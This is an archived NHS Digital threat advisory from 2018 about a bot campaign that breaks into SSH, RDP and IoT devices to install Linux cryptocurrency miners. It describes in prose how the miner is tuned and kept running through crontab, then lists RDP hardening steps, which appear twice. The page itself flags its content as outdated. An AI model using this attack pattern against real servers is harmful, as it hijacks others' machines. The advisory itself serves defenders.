SSH RDP Cryptomining Campaign

Security researchers have detected an automated campaign to install cryptocurrency mining malware on Internet-facing servers and other devices.

Threat ID:: CC-2518
Category:: Cryptocurrency
Threat Severity:: Medium
Threat Vector:: Insecure network
Published:: 28 June 2018 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of this information contained in this page is at your own risk

Summary

Security researchers have detected an automated campaign to install cryptocurrency mining malware on Internet-facing servers and other devices.

Affected platforms

The following platforms are known to be affected:

Linux

Linux - All versions

Threat details

An Internet bot has been scanning for devices with open ports relating to Secure Shell (SSH), Remote Desktop Protocol (RDP) and Internet of Things services. It then attempts to exploit these to download and execute a script.

The script checks for Internet connectivity and determines which Linux distribution is being used. It then sets up hugepage and memlock for better mining throughput. It downloads and runs the cryptocurrency miner, and finally adds a new entry to the device's crontab file so that the miner will continue to be run automatically.

Remediation steps

Type	Step
	If Remote Desktop Protocol (RDP) is not used, then ensure port 3389 (TCP/UDP) is blocked at your internet firewall. If RDP is used, then: Only allow access for authorised RDP users. Enforce strong password policies. Enforce multi-factor authentication. Don't allow RDP access for privileged user accounts. Don’t use generic accounts. Set user accounts with an expiry date. Audit user accounts periodically. Only allow point-to-point connections from specific IP addresses where feasible. Ensure Transport Layer Security (TLS) is up-to-date. Log and monitor all RDP activity and investigate unusual behaviour. Consider only allowing RDP for authorised virtual private network (VPN) connections.

Type

Step

If Remote Desktop Protocol (RDP) is not used, then ensure port 3389 (TCP/UDP) is blocked at your internet firewall. If RDP is used, then:

Only allow access for authorised RDP users.
Enforce strong password policies.
Enforce multi-factor authentication.
Don't allow RDP access for privileged user accounts.
Don’t use generic accounts.
Set user accounts with an expiry date.
Audit user accounts periodically.
Only allow point-to-point connections from specific IP addresses where feasible.
Ensure Transport Layer Security (TLS) is up-to-date.
Log and monitor all RDP activity and investigate unusual behaviour.
Consider only allowing RDP for authorised virtual private network (VPN) connections.

Last edited: 17 February 2020 12:55 pm